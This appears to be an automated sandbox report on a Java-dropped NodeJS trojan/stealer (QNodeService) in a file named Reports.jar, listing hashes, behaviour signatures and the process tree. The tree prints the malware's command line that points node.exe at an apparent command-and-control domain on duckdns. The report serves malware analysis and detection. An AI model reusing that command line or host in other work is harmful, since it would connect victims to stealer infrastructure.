Analysis

  max time kernel:   119s
  max time network:  120s
  platform:          windows10_x64
  resource:          win10v20201028
  submitted:         24-11-2020 10:12

Static task: static1

Behavioral task: behavioral1
  Sample:    Reports.jar
  Resource:  win7v20201028 (windows7_x64)
  0 signatures, 0 seconds

Behavioral task: behavioral2
  Sample:    Reports.jar
  Resource:  win10v20201028 (windows10_x64)
  0 signatures, 0 seconds
General

  Target:  Reports.jar
  Size:    54KB
  MD5:     6b6655ba29db159bd71a97864c6f6cc5
  SHA1:    cda3d5265f3349720e30bc22e3136c401707add2
  SHA256:  513f8d26cafd992200610473c26cb427a5e328b9247b1313fdde5ad151cfa9ed
  SHA512:  096ed83211fe99a2d6b41bf3db026c08ac11dcefad733248e33b15d35aa8c52851dce36ca5d214b0015e13d87ea255489a63a5148abd5790f6761e3f68738500
  Score:   10/10
Malware Config

Signatures

  QNodeService
    Trojan/stealer written in NodeJS and spread via Java downloader.

  Executes dropped EXE (1 IoCs)
    pid   Process
    3304  node.exe

  JavaScript code in executable (1 IoCs)
    resource                                      yara_rule
    behavioral2/files/0x000100000001ab77-161.dat  js

  Suspicious behavior: EnumeratesProcesses (4 IoCs)
    pid   Process
    3304  node.exe
    3304  node.exe
    3304  node.exe
    3304  node.exe

  Suspicious use of WriteProcessMemory (4 IoCs)
    description                        pid   Process    procid_target
    PID 492 wrote to memory of 3288    492   java.exe   76
    PID 492 wrote to memory of 3288    492   java.exe   76
    PID 3288 wrote to memory of 3304   3288  javaw.exe  80
    PID 3288 wrote to memory of 3304   3288  javaw.exe  80
Processes

  1. Image:         C:\ProgramData\Oracle\Java\javapath\java.exe
     Command line:  java -jar C:\Users\Admin\AppData\Local\Temp\Reports.jar
     PID:           492
     - Suspicious use of WriteProcessMemory

     2. Image:         C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
        Command line:  "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\613dfde4.tmp
        PID:           3288
        - Suspicious use of WriteProcessMemory

        3. Image:         C:\Users\Admin\node-v14.12.0-win-x64\node.exe
           Command line:  C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain lal54.duckdns.org
           PID:           3304
           - Executes dropped EXE
           - Suspicious behavior: EnumeratesProcesses